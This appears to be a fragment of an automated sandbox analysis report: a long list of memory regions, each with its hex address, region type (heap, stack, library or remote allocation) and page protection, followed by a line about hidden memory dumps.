page read and write
2CAF000
stack
page read and write
38E2000
heap
page read and write
4FE0000
heap
page read and write
478000
remote allocation
page execute and read and write
1A3000
trusted library allocation
page execute and read and write
51F000
stack
page read and write
684000
heap
page read and write
510000
heap
page execute and read and write
197000
stack
page read and write
210000
trusted library allocation
page read and write
3B0000
heap
page read and write
320000
heap
page read and write
B71000
heap
page read and write
386000
heap
page read and write
1D0000
trusted library allocation
page read and write
46F000
heap
page read and write
2D32000
heap
page read and write
3AC000
stack
page read and write
A50000
heap
page read and write
4AC5000
heap
page read and write
370000
trusted library allocation
page read and write
6D4000
heap
page read and write
78A000
heap
page read and write
EFE000
stack
page read and write
2A34000
trusted library allocation
page read and write
3941000
heap
page read and write
A80000
heap
page read and write
CAD000
stack
page read and write
4E29000
heap
page read and write
299E000
trusted library allocation
page read and write
2D6000
heap
page read and write
1BA000
trusted library allocation
page read and write
2104000
heap
page read and write
317000
trusted library allocation
page read and write
61AE000
stack
page read and write
111E000
trusted library allocation
page read and write
64E000
stack
page read and write
D30000
trusted library allocation
page read and write
5DB000
heap
page read and write
5F5E000
stack
page read and write
4DE0000
heap
page read and write
3934000
heap
page read and write
B26000
heap
page read and write
360000
trusted library allocation
page read and write
38B4000
heap
page read and write
F10000
trusted library allocation
page read and write
3D9000
heap
page read and write
DDE000
stack
page read and write
118D000
stack
page read and write
12C000
stack
page read and write
3BEF000
stack
page read and write
2C54000
trusted library allocation
page read and write
370000
trusted library allocation
page read and write
4A50000
heap
page read and write
2B10000
trusted library allocation
page read and write
3B2E000
heap
page read and write
3940000
heap
page read and write
3951000
heap
page read and write
46F000
heap
page read and write
42A0000
trusted library allocation
page read and write
4FE2000
heap
page read and write
43CF000
stack
page read and write
6ED000
heap
page read and write
9FE000
stack
page read and write
3AD000
heap
page read and write
4EF000
heap
page read and write
38E2000
heap
page read and write
78A000
heap
page read and write
CF0000
trusted library allocation
page read and write
8C0000
trusted library allocation
page read and write
3532000
trusted library allocation
page read and write
914000
heap
page read and write
5F7000
heap
page read and write
466000
heap
page read and write
1FF000
heap
page read and write
62D000
heap
page read and write
2A74000
trusted library allocation
page read and write
3B2A000
heap
page read and write
250000
heap
page read and write
4EF000
heap
page read and write
3AE000
heap
page read and write
113E000
stack
page read and write
2D7C000
heap
page read and write
238C000
heap
page read and write
8FE000
stack
page read and write
1F0000
heap
page read and write
38C1000
heap
page read and write
1C2000
trusted library allocation
page read and write
3CE000
heap
page read and write
5E00000
heap
page read and write
3B25000
heap
page read and write
B70000
trusted library allocation
page read and write
3B6000
heap
page read and write
380000
trusted library allocation
page read and write
6B7000
heap
page read and write
D7C1000
trusted library allocation
page read and write
2B61000
heap
page read and write
3B46000
heap
page read and write
1FBF000
stack
page read and write
422C000
stack
page read and write
B2E000
stack
page read and write
1125000
trusted library allocation
page read and write
50FE000
heap
page read and write
50C5000
heap
page read and write
5BC000
stack
page read and write
530000
trusted library allocation
page read and write
393000
heap
page read and write
372F000
heap
page read and write
32E0000
heap
page read and write
4F7D000
stack
page read and write
4D9F000
stack
page read and write
28E000
heap
page read and write
2D9000
heap
page read and write
3B38000
heap
page read and write
35E000
stack
page read and write | page guard
570000
trusted library allocation
page read and write
29D6000
trusted library allocation
page read and write
38E2000
heap
page read and write
34D000
heap
page read and write
3BFF000
stack
page read and write
645000
heap
page read and write
DFD000
stack
page read and write
D20000
trusted library allocation
page read and write
4C7E000
stack
page read and write
3E80000
heap
page read and write
4CEF000
stack
page read and write
987000
heap
page read and write
672000
heap
page read and write
E40000
heap
page read and write
1AA000
trusted library allocation
page read and write
27B3000
trusted library allocation
page read and write
34A000
heap
page read and write
36B000
heap
page read and write
2B9000
heap
page read and write
12FE000
stack
page read and write
400000
heap
page read and write
2220000
heap
page read and write
3FE000
stack
page read and write
2DE000
stack
page read and write | page guard
2AC000
heap
page read and write
CDC1000
trusted library allocation
page read and write
E70000
trusted library allocation
page execute and read and write
4230000
trusted library allocation
page read and write
367000
heap
page read and write
3D9000
heap
page read and write
602E000
stack
page read and write
716000
heap
page read and write
2771000
trusted library allocation
page read and write
AD0000
trusted library allocation
page read and write
419E000
stack
page read and write
78A000
heap
page read and write
350000
heap
page read and write
40EF000
stack
page read and write
3EEE000
stack
page read and write
35F000
stack
page read and write
3B38000
heap
page read and write
B0000
heap
page read and write
658000
heap
page read and write
402000
heap
page read and write
2C0000
heap
page read and write
2D2D000
heap
page read and write
2D66000
heap
page read and write
10BE000
stack
page read and write
2D53000
heap
page read and write
F50000
trusted library allocation
page execute and read and write
260000
heap
page read and write
3C04000
heap
page read and write
6380000
heap
page read and write
650000
heap
page read and write
1AD000
trusted library allocation
page execute and read and write
48CF000
stack
page read and write
450000
heap
page read and write
210000
trusted library allocation
page execute and read and write
4A51000
heap
page read and write
3E6000
heap
page read and write
A00000
heap
page execute and read and write
51DE000
stack
page read and write
AE0000
trusted library allocation
page read and write
2AE000
heap
page read and write
1E0000
trusted library allocation
page read and write
3BA000
heap
page read and write
4B56000
heap
page read and write
257000
heap
page read and write
38EC000
stack
page read and write
45A000
heap
page read and write
82DE000
trusted library allocation
page read and write
380000
trusted library allocation
page execute and read and write
3AD3000
heap
page read and write
1CF5000
heap
page read and write
3220000
heap
page read and write
112A000
trusted library allocation
page read and write
4A4F000
stack
page read and write
3962000
heap
page read and write
2C90000
heap
page read and write
390000
trusted library allocation
page read and write
42A0000
trusted library allocation
page read and write
1F8000
trusted library allocation
page read and write
3C6000
heap
page read and write
610000
trusted library allocation
page read and write
79A000
heap
page read and write
6ED000
heap
page read and write
628000
heap
page read and write
870000
heap
page read and write
1FF000
heap
page read and write
1B0000
trusted library allocation
page read and write
3D9000
heap
page read and write
4F3E000
stack
page read and write
102E000
stack
page read and write
5090000
heap
page read and write
2E3E000
stack
page read and write
36A000
heap
page read and write
79A000
heap
page read and write
376F000
stack
page read and write
10000
heap
page read and write
4230000
trusted library allocation
page read and write
79A000
heap
page read and write
1EA000
trusted library allocation
page read and write
650000
heap
page read and write
2B34000
trusted library allocation
page read and write
5070000
heap
page read and write
3C07000
heap
page read and write
2AC000
heap
page read and write
110E000
stack
page read and write
1C5000
trusted library allocation
page execute and read and write
4AA3000
heap
page read and write
3E29000
heap
page read and write
31C000
heap
page read and write
FFF000
stack
page read and write
5030000
heap
page read and write
371D000
heap
page read and write
60FE000
stack
page read and write
65F000
heap
page read and write
18A000
stack
page read and write
4E2E000
heap
page read and write
368000
heap
page read and write
3534000
trusted library allocation
page read and write
3E25000
heap
page read and write
3C0A000
heap
page read and write
44F000
heap
page read and write
D90000
trusted library allocation
page read and write
4F74000
heap
page read and write
180000
trusted library allocation
page read and write
3B2A000
heap
page read and write
5030000
heap
page read and write
2D56000
heap
page read and write
2D31000
heap
page read and write
2B12000
trusted library allocation
page read and write
1CF0000
heap
page read and write
5C8E000
stack
page read and write
50DA000
heap
page read and write
513E000
stack
page read and write
DB0000
trusted library allocation
page read and write
620000
heap
page read and write
3949000
heap
page read and write
3EF000
heap
page read and write
1FB000
heap
page read and write
10000
heap
page read and write
3DE000
heap
page read and write
4BC6000
heap
page read and write
4FE5000
heap
page read and write
1DD000
trusted library allocation
page execute and read and write
5D3E000
stack
page read and write
544000
heap
page read and write
3A0F000
stack
page read and write
3A9000
trusted library allocation
page read and write
205000
trusted library allocation
page execute and read and write
30D0000
heap
page read and write
5070000
heap
page read and write
3A2000
heap
page read and write
65D000
heap
page read and write
190000
trusted library allocation
page read and write
3535000
trusted library allocation
page read and write
277F000
stack
page read and write
2D53000
heap
page read and write
3FED000
stack
page read and write
1FA000
trusted library allocation
page execute and read and write
8A7000
heap
page read and write
1F4F000
stack
page read and write
388000
heap
page read and write
3C07000
heap
page read and write
2D0F000
stack
page read and write
3799000
trusted library allocation
page read and write
6AE000
stack
page read and write
44F000
heap
page read and write
3771000
trusted library allocation
page read and write
3BB000
heap
page read and write
10BF000
stack
page read and write
3924000
heap
page read and write
46F000
heap
page read and write
3C00000
heap
page read and write
895000
heap
page read and write
2B3D000
trusted library allocation
page read and write
A18000
heap
page read and write
2CC000
heap
page read and write
10000
heap
page read and write
1111000
trusted library allocation
page read and write
42A0000
trusted library allocation
page read and write
20000
heap
page read and write
300000
trusted library allocation
page execute and read and write
43A000
heap
page read and write
2CC000
heap
page read and write
2D3D000
heap
page read and write
4BBE000
stack
page read and write
3C2000
heap
page read and write
119E000
stack
page read and write
1C0000
trusted library allocation
page read and write
2A94000
trusted library allocation
page read and write
AC0000
trusted library allocation
page read and write
370000
heap
page read and write
79A000
heap
page read and write
960000
trusted library allocation
page read and write
3F3000
heap
page read and write
2A8000
heap
page read and write
38CF000
heap
page read and write
34A000
heap
page read and write
3AB0000
heap
page read and write
9BE000
unkown
page read and write
27AF000
trusted library allocation
page read and write
4DFE000
stack
page read and write
3DA000
heap
page read and write
42A0000
trusted library allocation
page read and write
2771000
trusted library allocation
page read and write
35AD000
stack
page read and write
3B46000
heap
page read and write
1FC000
heap
page read and write
43A000
heap
page read and write
3BB000
heap
page read and write
7DC1000
trusted library allocation
page read and write
3CF000
heap
page read and write
78C000
heap
page read and write
F8B000
stack
page read and write
3C7000
heap
page read and write
103E000
stack
page read and write
4E0000
trusted library allocation
page read and write
2451000
heap
page read and write
121B000
stack
page read and write
There are 935 hidden memdumps, click here to show them.